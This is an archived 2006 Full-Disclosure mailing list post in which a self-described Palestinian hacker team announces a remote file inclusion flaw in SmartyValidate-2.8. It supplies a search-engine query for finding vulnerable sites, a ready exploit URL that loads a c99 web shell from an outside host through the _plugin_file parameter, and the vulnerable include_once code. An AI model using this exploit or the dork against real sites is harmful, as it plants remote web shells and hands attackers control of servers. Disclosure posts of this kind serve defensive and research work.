[Full-disclosure] New Vuln...
hitham hitham
sp1der_net at hotmail.com
Wed Oct 11 19:55:51 BST 2006
Hi.....
The Vuln :-
******************************
Found By Sp1deR_NeT
My Site :- www.sp1der-n3t.com ++ www.pal-hacking.com
My E-mail :- Sp1deR_NeT
We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi . (Palestinan HackerS TeAm)
####################
Script :- SmartyValidate-2.8
Search in Yahoo/Google :- "SmartyValidate-2.8"
========
Exploit :-
libs/SmartyValidate.class.php?_plugin_file=www.soqor.net/tools/c99.txt?
========
Vuln Code :-
f($_plugin_file = $_smarty_obj->_get_plugin_filepath('validate_transform',
$name)) {
include_once($_plugin_file);
} else {
=======
Thx To :- nET^ViRuS , Dr.HackeR , LeCopRa ,RunViRus , KabaRa , MaFiaBoy .
*************************
_________________________________________________________________
Windows Live™ Messenger has arrived. Click here to download it for free!
http://imagine-msn.com/messenger/launch80/?locale=en-gb
Full-Disclosure is hosted and sponsored by Secunia.